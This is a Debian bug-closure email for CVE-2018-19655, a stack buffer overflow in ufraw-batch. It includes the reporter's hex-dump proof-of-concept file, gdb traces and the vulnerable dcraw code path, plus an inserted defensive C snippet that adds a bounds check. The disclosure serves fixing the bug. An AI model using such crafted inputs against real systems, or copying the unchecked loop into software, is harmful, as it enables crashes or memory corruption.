Your message dated Fri, 07 Dec 2018 10:34:29 +0000
with message-id <e1gvdsn-000cp6...@fasolo.debian.org>
and subject line Bug#890086: fixed in ufraw 0.22-3.1
has caused the Debian Bug report #890086,
regarding ufraw: CVE-2018-19655: stack buffer overflow while running ufraw-batch
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)

--
890086: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=890086
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: ufraw-batch
Version: 0.22-2
Severity: important
Tags: security

stack buffer overflow running ufraw-batch with "--overwrite poc" option

Running 'ufraw-batch --overwrite poc' with the attached file raises a stack
buffer overflow which may allow a remote attacker to cause unspecified impact
including a denial-of-service attack.

I expected the program to terminate without a segfault, but the program
crashes as follows:

june@june:~/temp/report/ufraw-batch/unknown$ ufraw-batch poc
*** stack smashing detected ***: ufraw-batch terminated
Segmentation fault

Below is debugging information about this bug.

0. poc file

00000000: 0001 0001 0040 2020 0000 0020 2020 4b41  .....@ ... KA
00000010: 492d 3033 3430 200f 4343 4343 4343 4343  I-0340 .CCCCCCCC
00000020: 4343 4343 4343 4343 4343 [4141] 6565     CCCCCCCCCCAAee

1. The two bytes [4141] above were stored in the variable 'raw_width' in the
DCRaw::identify function at dcraw.cc:

8871      } else if (!memcmp (head,"\0\001\0\001\0@",6)) {
8872        fseek (ifp, 6, SEEK_SET);
8873        fread (make, 1, 8, ifp);
8874        fread (model, 1, 8, ifp);
8875        fread (model2, 1, 16, ifp);
8876        data_offset = get2();
8877        get2();
8878        raw_width = get2();     // HERE
8879        raw_height = get2();
8880        load_raw = &CLASS nokia_load_raw;
8881        filters = 0x61616161;

--gdb--
8878        raw_width = get2();
(gdb) n
8879        raw_height = get2();
(gdb) p/x raw_width
$21 = 0x4141
-------

2. And then it was stored in the variable 'width' in the same function:

9008      desc[511] = artist[63] = make[63] = model[63] = model2[63] = 0;
9009      if (!is_raw) goto notraw;
9010
9011      if (!height) height = raw_height;
9012      if (!width)  width  = raw_width;     // HERE
9013      if (height == 2624 && width == 3936) /* Pentax K10D and Samsung GX10 */
9014        { height  = 2616;   width  = 3896; }
9015      if (height == 3136 && width == 4864) /* Pentax K20D and Samsung GX20 */

--gdb--
Breakpoint 9, DCRaw::identify (this=this@entry=0x7ffff48b2010) at dcraw.cc:9012
9012      if (!width)  width  = raw_width;
$24 = 0
(gdb) n
9013      if (height == 2624 && width == 3936) /* Pentax K10D and Samsung GX10 */
(gdb) p/x width
$25 = 0x4141

3. This 'width' was used in the loop below in the function DCRaw::find_green
in the same file:

8504    float CLASS find_green (int bps, int bite, int off0, int off1)
8505    {
8506      UINT64 bitbuf=0;
8507      int vbits, col, i, c;
8508      ushort img[2][2064];
8509      double sum[]={0,0};
8510
8511      FORC(2) {
8512        fseek (ifp, c ? off1:off0, SEEK_SET);
8513        for (vbits=col=0; col < width; col++) {          // HERE(1), width was used
8514          for (vbits -= bps; vbits < 0; vbits += bite) {
8515            bitbuf <<= bite;
8516            for (i=0; i < bite; i+=8)
8517              bitbuf |= (unsigned) (fgetc(ifp) << i);
8518          }
8519          img[c][col] = bitbuf << (64-bps-vbits) >> (64-bps);  // HERE(2), col is index of img buffer
8520        }
8521      }
8522      FORC(width-1) {
8523        sum[ c & 1] += ABS(img[0][c]-img[1][c+1]);
8524        sum[~c & 1] += ABS(img[1][c]-img[0][c+1]);
8525      }
8526      return 100 * log(sum[0]/sum[1]);
8527    }

At HERE(2), the local variable 'col' increases until it equals the variable
'width', which can easily be modified by the input file and can have a value
big enough to overwrite the local buffer img.

=========================================================================
This bug was found with a fuzzer developed by the 'SoftSec' group at KAIST.

-- System Information:
Debian Release: 9.3
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'unstable'), (500, 'testing'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 4.9.0-3-amd64 (SMP w/1 CPU core)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8), LANGUAGE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages ufraw-batch depends on:
ii  libbz2-1.0       1.0.6-8.1
ii  libc6            2.24-11+deb9u1
ii  libexiv2-14      0.25-3.1
ii  libgcc1          1:6.3.0-18
ii  libglib2.0-0     2.50.3-2
ii  libgomp1         6.3.0-18
ii  libjpeg62-turbo  1:1.5.1-2
ii  liblcms2-2       2.8-4
ii  liblensfun1      0.3.2-3
ii  libpng16-16      1.6.28-1
ii  libstdc++6       6.3.0-18
ii  libtiff5         4.0.8-2+deb9u2
ii  zlib1g           1:1.2.8.dfsg-5

ufraw-batch recommends no packages.

Versions of packages ufraw-batch suggests:
pn  ufraw  <none>

-- no debconf information
poc
Description: Binary data
--- End Message ---
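The overflow path the report walks through, as an added example that is neither ufraw's code nor the Debian patch: a file-controlled raw_width is parsed from a constructed header with the poc's layout, and the stand-in for the find_green() column loop refuses any width that does not fit the fixed 2064-entry row instead of indexing past it. It assumes big-endian get2() for this header and that the 0.22-3.1 fix may differ from this check; IMG_COLS is taken from the img declaration quoted in the report.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define IMG_COLS 2064  /* capacity of dcraw's `ushort img[2][2064]` in find_green() */

/* 16-bit big-endian read; dcraw's get2() uses this order unless the file
   announces little-endian, which this header does not (assumption). */
static unsigned get2_be(const uint8_t *p) { return ((unsigned)p[0] << 8) | p[1]; }

/* Mirrors the header walk in DCRaw::identify for the "\0\001\0\001\0@" format:
   6-byte magic, make[8], model[8], model2[16], data_offset, one skipped u16,
   then raw_width at offset 42. Returns 0 on success, -1 on a short or foreign buffer. */
int parse_raw_width(const uint8_t *buf, size_t len, unsigned *raw_width)
{
    if (len < 46 || memcmp(buf, "\0\001\0\001\0@", 6) != 0) return -1;
    *raw_width = get2_be(buf + 42);
    return 0;
}

/* Hardened stand-in for the column loop in find_green(): the file-controlled
   width is checked against the fixed buffer before it is used as an index.
   (Our own check, not necessarily the one applied in 0.22-3.1.) */
int fill_columns_checked(uint16_t img[2][IMG_COLS], unsigned width,
                         const uint8_t *pix, size_t len)
{
    if (width == 0 || width > IMG_COLS) return -1;   /* would overrun img[c][col] */
    if (len < (size_t)width * 2 * 2) return -1;       /* two rows of 16-bit samples */
    for (int c = 0; c < 2; c++)
        for (unsigned col = 0; col < width; col++)
            img[c][col] = (uint16_t)get2_be(pix + ((size_t)c * width + col) * 2);
    return 0;
}

/* Constructed header with the poc's layout (magic, then 0x41 0x41 at offset 42).
   Returns -1: the parsed raw_width 0x4141 (16705) is rejected, where the
   original loop would have written far past a 2064-entry row. */
int demo(void)
{
    uint8_t hdr[46] = {0};
    unsigned width = 0;
    uint16_t img[2][IMG_COLS];
    memcpy(hdr, "\0\001\0\001\0@", 6);
    hdr[42] = 0x41; hdr[43] = 0x41;
    if (parse_raw_width(hdr, sizeof hdr, &width) != 0) return -2;
    return fill_columns_checked(img, width, hdr, sizeof hdr);
}
```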
--- Begin Message ---
Source: ufraw
Source-Version: 0.22-3.1

We believe that the bug you reported is fixed in the latest version of
ufraw, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 890...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Salvatore Bonaccorso <car...@debian.org> (supplier of updated ufraw package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Sun, 02 Dec 2018 10:55:01 +0100
Source: ufraw
Binary: ufraw ufraw-batch gimp-ufraw
Architecture: source
Version: 0.22-3.1
Distribution: unstable
Urgency: medium
Maintainer: Hubert Chathi <uho...@debian.org>
Changed-By: Salvatore Bonaccorso <car...@debian.org>
Closes: 890086
Description:
 gimp-ufraw  - gimp importer for raw camera images
 ufraw       - standalone importer for raw camera images
 ufraw-batch - batch importer for raw camera images
Changes:
 ufraw (0.22-3.1) unstable; urgency=medium
 .
   * Non-maintainer upload.
   * stack-based buffer overflow bug (CVE-2018-19655) (Closes: #890086)
Checksums-Sha1:
 4e974886a4ec3a379d03d48a58588506d15f16a3 2127 ufraw_0.22-3.1.dsc
 0fc453b0924c4df46276533d00e8766835763b07 8672 ufraw_0.22-3.1.debian.tar.xz
Checksums-Sha256:
 dc869baa14afba40691f753d2312f1a97c24eb51d952f2f86697672fa9b14d48 2127 ufraw_0.22-3.1.dsc
 27176a7e800cc47497d82b5fb333977a578f59eb309e9ad71446327ba05fa9a7 8672 ufraw_0.22-3.1.debian.tar.xz
Files:
 9a667e8d59ca7c43f19e52df76e0eec2 2127 graphics optional ufraw_0.22-3.1.dsc
 4d4a2cabb9e3f14b9d9002b266dba948 8672 graphics optional ufraw_0.22-3.1.debian.tar.xz
--- End Message ---